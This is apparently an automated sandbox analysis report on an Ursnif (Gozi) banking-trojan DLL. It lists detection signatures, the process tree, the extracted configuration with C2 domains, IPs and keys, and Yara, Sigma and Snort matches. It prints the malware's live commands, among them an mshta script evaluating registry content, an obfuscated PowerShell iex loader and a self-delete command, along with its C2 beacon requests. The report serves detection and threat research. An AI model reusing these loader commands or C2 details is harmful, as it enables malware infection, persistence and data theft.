
Windows Analysis Report
626a983c091a8.tiff.dll

Overview

General Information

Sample Name: 626a983c091a8.tiff.dll
Analysis ID: 617384
MD5: 388aa15c4d1a96534e7ca5587942fa0a
SHA1: a88e07643c07c8f75845c82c19cd928355d441b2
SHA256: abc6dfca9ad106cf41da3b6309a15e2a761991d2fad41662211b1afb1c2b0973
Tags: dll, gozi_ifsb, ursnif, 3000

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 3332 cmdline: loaddll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 2012 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4956 cmdline: rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 6784 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • mshta.exe (PID: 6312 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ssif='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ssif).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6648 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6732 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9868.tmp" "c:\Users\user\AppData\Local\Temp\o1ulwvct\CSC9597862635B74071BA42F3284427E86E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6756 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tn4ral5l\tn4ral5l.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6792 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA96F.tmp" "c:\Users\user\AppData\Local\Temp\tn4ral5l\CSC7E5DF85510FF49B49113DD9CBF81BD4.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6244 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a983c091a8.tiff.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6096 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
  • cleanup
Malware configuration (Ursnif): {"RSA Public Key": "+FflIsIAzGiUM0s27tuLbRAwZqYoqmNsTeF7rxG/Mwp38QqxThLLXpreOfEHBItOJka6enf+5fp9fT9wIfjoNQYondBMg0CXVUaaXZmXPw7dFUCTuwl/1fJ8Te0BDO4/e0D+MT+n6Ovzq2MwCzSIm7W4ZiEEkdm60WNeCsFwnx1f78Cv9j4wv9nLP3bFRx9OkdD66cn4ATsp0wULyGpOtly6uJj4gNSoIxbBBQeCFBEVhnqZ/KZ3/SbtJUJ3X757TgS02V8uV2DJldCmSy1UGDylgn9Cs1EUm4RQgf1fFSmTn7kcnOpsq0753wd2/m9Jbas3/WEwOA88vTsSUvhPp7zr8Ltl9tao4hrJvcTrul8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "hopexmder.net", "94.140.114.144", "94.140.112.49", "94.140.112.121"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, calc no*ad *terminal* *debug*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Yara matches (memory dumps)

Source | Rule | Description | Author | Strings
00000019.00000000.368081484.0000000000D70000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000002.00000003.253552130.0000000005008000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000002.418912961.0000000004C8F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000002.00000003.302561550.0000000004F0A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(21 further entries omitted)

Yara matches (unpacked PE files)

Source | Rule | Description | Author | Strings
2.2.rundll32.exe.2ca0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.49494a0.10.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.49494a0.10.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.4f0a4a0.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.4f0a4a0.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(2 further entries omitted)

System Summary

Sigma rule matches

Source: File created | Author: Florian Roth | Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 6312, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ssif='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ssif).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6312, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6476, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth | Data: Command: rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2012, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\626a983c091a8.tiff.dll",#1, ProcessId: 4956, ProcessName: rundll32.exe
Source: Process started | Author: Florian Roth | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ssif='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ssif).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6312, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6476, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6476, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline, ProcessId: 6648, ProcessName: csc.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6476, TargetFilename: C:\Users\user\AppData\Local\Temp\o1ulwvct\o1ulwvct.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ssif='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ssif).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6312, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6476, ProcessName: powershell.exe
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132956272794820055.6476.DefaultAppDomain.powershell
Source: Process started | Author: frack113 | Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxrvwmqrt -value gp; new-alias -name xfmkywxojr -value iex; xfmkywxojr ([System.Text.Encoding]::ASCII.GetString((jxrvwmqrt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6476, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6488, ProcessName: conhost.exe
Snort IDS alerts

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
04/28/22-15:47:50.266267 | 2033203 | 49759 | 80 | TCP | A Network Trojan was detected
04/28/22-15:47:52.636763 | 2033203 | 49759 | 80 | TCP | A Network Trojan was detected
04/28/22-15:47:51.337694 | 2033203 | 49759 | 80 | TCP | A Network Trojan was detected



AV Detection

Source: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "+FflIsIAzGiUM0s27tuLbRAwZqYoqmNsTeF7rxG/Mwp38QqxThLLXpreOfEHBItOJka6enf+5fp9fT9wIfjoNQYondBMg0CXVUaaXZmXPw7dFUCTuwl/1fJ8Te0BDO4/e0D+MT+n6Ovzq2MwCzSIm7W4ZiEEkdm60WNeCsFwnx1f78Cv9j4wv9nLP3bFRx9OkdD66cn4ATsp0wULyGpOtly6uJj4gNSoIxbBBQeCFBEVhnqZ/KZ3/SbtJUJ3X757TgS02V8uV2DJldCmSy1UGDylgn9Cs1EUm4RQgf1fFSmTn7kcnOpsq0753wd2/m9Jbas3/WEwOA88vTsSUvhPp7zr8Ltl9tao4hrJvcTrul8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "hopexmder.net", "94.140.114.144", "94.140.112.49", "94.140.112.121"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, calc no*ad *terminal* *debug*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source: 626a983c091a8.tiff.dll | Joe Sandbox ML: detected
Source: 626a983c091a8.tiff.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.366271329.0000000005F50000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.361877271.0000000005F50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\in\the\town\where\ahung.pdb source: 626a983c091a8.tiff.dll
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.366271329.0000000005F50000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.361877271.0000000005F50000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_059365C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_059365C2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_059399BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_059399BC
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0594BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_0594BAD1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0593FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0593FD47

Networking

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 94.140.115.8 80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49759 -> 94.140.115.8:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49759 -> 94.140.115.8:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: Joe Sandbox View | ASN Name: NANO-ASLV
Source: global traffic | HTTP traffic detected: GET /drew/ik1LQOZMh/mVRbIyzEQTxBwTr6Z5u6/zI22UmjAz8JK2nSoDWz/PBbBE92xQ6eDvkHhGI4LUa/C2IzDYhRuCy1X/B8bDGu4d/NNeE2BpCwJS_2BLL1GATet_/2FJaGdNT8S/qykJG_2BzgaYwDsmt/6L38BacVeBDK/DI5poywJVgk/0BVE0JF2RsEX1d/ehK8HVo5nM5dN_2BvfT0B/d2eei3kq6JFp_2Bo/wjjnHOVxOWAf9Rl/iq5emFWqLQuh9aW2bI/a4pKOz5Hp/Nn13tipc/V.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 94.140.115.8 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/BCNeqjF198SdSe826/ArOdCqmPIWdy/mLsvCOAaonH/_2B_2FaHw_2FNP/whZllPw0UWDpWxMk3vD70/ZW7HQlXyVsLFMEnd/ioWk92wZdXi7gVZ/YpqeONxg_2FtJ1pLE0/gkg_2BzOr/T30turd_2FCKY_2FdW3S/SQG35opQqK5eweX5X3z/X5WbnNy0h0F7CgoMJPXQn8/WlhTd00F2BAHX/eC3JkGFi/jMv01ywCxcdZG9_2BXsKQ2k/cWPyDUzVgF/HeX7VJFkhkvecZXZ0/41xqfgFNRUy_/2Fgmw0qSg6Ao/JqGQVxm.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 94.140.115.8 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/pWUKzJDbrhpv/FFkNspqcCVD/4ANu5UR3K56aq1/YlZTd4vqqjxlSWQE81tmv/0903hK9AGVho5G_2/FPX1B2ZeY41YUql/9Zl7hUh81wcOKdUUaq/Z_2FlHHRh/JDsEpYdxv2Sil3Q8A91e/jYpDxmigXCYZ8PDT72P/GzAMhzuxMmNvrbZtpOxqlx/F1jRyqu5A3bI6/9P2_2BGh/CvwgeSwx46r_2FQDHgxUtUu/VEvc4RUsji/nf7CiGV7ZHZfisjbY/l_2FOYdkMf6Q/cPBDnAZaABD/3v7KHlHBv_2B/_2BGS0Es/y.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 94.140.115.8 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 94.140.115.8 (50 occurrences)
Source: rundll32.exe, 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000014.00000003.329756539.000001ED77FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.329437199.000001ED77FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369787923.000001ED77FA0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: rundll32.exe, 00000002.00000003.356868757.0000000005F38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.369171366.000001ED7862C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371395758.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.371299641.000001AD5FCAC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: global traffic | HTTP traffic detected: GET /drew/ik1LQOZMh/mVRbIyzEQTxBwTr6Z5u6/zI22UmjAz8JK2nSoDWz/PBbBE92xQ6eDvkHhGI4LUa/C2IzDYhRuCy1X/B8bDGu4d/NNeE2BpCwJS_2BLL1GATet_/2FJaGdNT8S/qykJG_2BzgaYwDsmt/6L38BacVeBDK/DI5poywJVgk/0BVE0JF2RsEX1d/ehK8HVo5nM5dN_2BvfT0B/d2eei3kq6JFp_2Bo/wjjnHOVxOWAf9Rl/iq5emFWqLQuh9aW2bI/a4pKOz5Hp/Nn13tipc/V.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 94.140.115.8 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/BCNeqjF198SdSe826/ArOdCqmPIWdy/mLsvCOAaonH/_2B_2FaHw_2FNP/whZllPw0UWDpWxMk3vD70/ZW7HQlXyVsLFMEnd/ioWk92wZdXi7gVZ/YpqeONxg_2FtJ1pLE0/gkg_2BzOr/T30turd_2FCKY_2FdW3S/SQG35opQqK5eweX5X3z/X5WbnNy0h0F7CgoMJPXQn8/WlhTd00F2BAHX/eC3JkGFi/jMv01ywCxcdZG9_2BXsKQ2k/cWPyDUzVgF/HeX7VJFkhkvecZXZ0/41xqfgFNRUy_/2Fgmw0qSg6Ao/JqGQVxm.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 94.140.115.8 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/pWUKzJDbrhpv/FFkNspqcCVD/4ANu5UR3K56aq1/YlZTd4vqqjxlSWQE81tmv/0903hK9AGVho5G_2/FPX1B2ZeY41YUql/9Zl7hUh81wcOKdUUaq/Z_2FlHHRh/JDsEpYdxv2Sil3Q8A91e/jYpDxmigXCYZ8PDT72P/GzAMhzuxMmNvrbZtpOxqlx/F1jRyqu5A3bI6/9P2_2BGh/CvwgeSwx46r_2FQDHgxUtUu/VEvc4RUsji/nf7CiGV7ZHZfisjbY/l_2FOYdkMf6Q/cPBDnAZaABD/3v7KHlHBv_2B/_2BGS0Es/y.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 94.140.115.8 | Connection: Keep-Alive | Cache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

